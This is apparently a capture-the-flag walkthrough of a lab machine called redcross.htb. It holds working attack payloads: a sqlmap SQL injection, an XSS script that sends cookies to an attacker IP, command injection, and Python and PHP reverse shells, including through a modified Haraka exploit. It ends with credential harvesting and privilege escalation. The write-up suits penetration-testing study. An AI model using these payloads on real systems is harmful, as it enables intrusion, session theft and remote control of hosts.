INITIAL EXPLORATION
1. ./nmapAutomator.sh 10.129.2.8 All

2. nano /etc/dnsmasq;systemctl reload dnsmasq; systemctl restart dnsmasq.service
add to configuration: address=/redcross.htb/10.129.x.x

3. ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -u https://intra.redcross.htb/FUZZ         
--> This reveals folders such as images, pages, javascript and documentation and inaccessible server-status function  

ALternatively:  wfuzz -w /usr/share/wordlists/dirb/common.txt --hc 404,403 https://intra.redcross.htb/FUZZ
4. ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u https://intra.redcross.htb/documentation/FUZZ.pdf    
--> this reveals documentation in pdf          

5. Fill in the contact form following instructions for express queue(title: credentials, body: username=admin)       
--> obtain temporary credentials (guest:guest)

6. Login to Messaging Intranet
--> observe 2 users - admin (uid 1) and guest (uid 5)

GAINING A FOOTHOLD
7. Put a ' in the user id filter field. 
--> The filter parameter "o" is vulnerable to sql injection. "	DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '2'') LIMIT 10' at line 1"

8. Two ways: the easy way is just to use the "%" input to get all the messages.
The hard way is to use sqlmap: sqlmap -r request.txt --risk=3 --dbms=mysql --random-agent --delay=1 --technique=UE

The SQL injection payload is:
Parameter: o (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: o=2') AND (SELECT 8098 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(8098=8098,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jxeH&page=app


--> seems like there are complaints about the admin web app. " admin webapp. I thought that you reinforced security on it... Alerts everywhere!!" This also hints at the use of Cross-Site Scripting as an attack vector.

9. We get the admin session cookie from the messaging app using Cross-Site Scripting via the contact form's contact field script:
Payload: p<script>var myimg = new Image(); myimg.src = 'http://10.10.14.22:8811/admin?=' + document.cookie;</script>

--> admin cookie PHPSESSID=33h8b3fav1t6a5tkurnu48onu5

10. ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u https://FUZZ.redcross.htb 
 or test for admin subdomain directly (cos you are suspicious)

11. Add in the PHPSESSID via the Storage Inspector. Then visit https://admin.redcross.htb/?page=login
--> we are logged in

12. Go to Network Access and enter our IP address into whitelisted IP.

13. Add user via the User Management function
--> obtained credentials hyun : xO5eIxbA

14. SSH into the box 
15. In /home/public/src/iptctl.c, we observe that command injection is possible.


16. Test command injection at Network access function (deny call): https://admin.redcross.htb/?page=firewall 
ip=11.11.11.11;curl%20http://10.10.14.22:8888/aaaa&id=13&action=deny
--> COmmand injection possible
17. Replace payload for command injection for reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
18. Upgrade the shell:
python -c 'import pty;pty.spawn("/bin/bash")'

ESTABLISHING A FIRM FOOTHOLD
19. nmap -Pn -p - -T4 -sV 10.129.2.8   
--> new port 1025 is now accessible

20. Haraka is a SMTP filtering MTA (https://en.wikipedia.org/wiki/Haraka_(software))
21. searchsploit haraka
22. Exploit needs to be changed so that it attacks port 1025 instead of 25. Change lin 123 from "25" to "1025".
23. wget the exploits to victim - wget 41162.py and netcat to /tmp
24. test that port 1025 can be reached from within the server (nc localhost 1025)
25. test for RCE using the haraka exploit:
python 41162.py -t penelope@redcross.htb -m 10.129.2.8 -c "wget http://10.10.14.22/" 
26. Get a real reverse shell (a lot of common reverse shells fail, even the "official" write-up one):
python 41162.py -t penelope@redcross.htb -m 10.129.2.8 -c "php -r '\$sock=fsockopen(\"10.10.14.22\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"  
PRIVILEGE ESCALATION
27. cd /var/www/html
28. grep -R password
--> obtained 3 creds to db. One of which is unixusrmgr : dheu%7wjx8B&

29. Connect via Postgresql:
psql -h 127.0.0.1 -d unix -U unixusrmgr

Reference:
https://serverfault.com/a/538503 
http://www.postgresqltutorial.com/postgresql-cheat-sheet/
https://gist.github.com/Kartones/dd3ff5ec5ea238d4c546

30. List tables with \dt

P.S. Press q if get stuck with bullshit "Cannot write to "elect admin default intra from passwd_table"  (press RETURN)" or other errors. Otherwise, redo the shell from www-data.

31. List passwd tables - select * from passwd_table;
32. update passwd_table set gid=27 where username='hyun';
33. SSH back and hyun (temp password: xO5eIxbA)
34. sudo su


                            





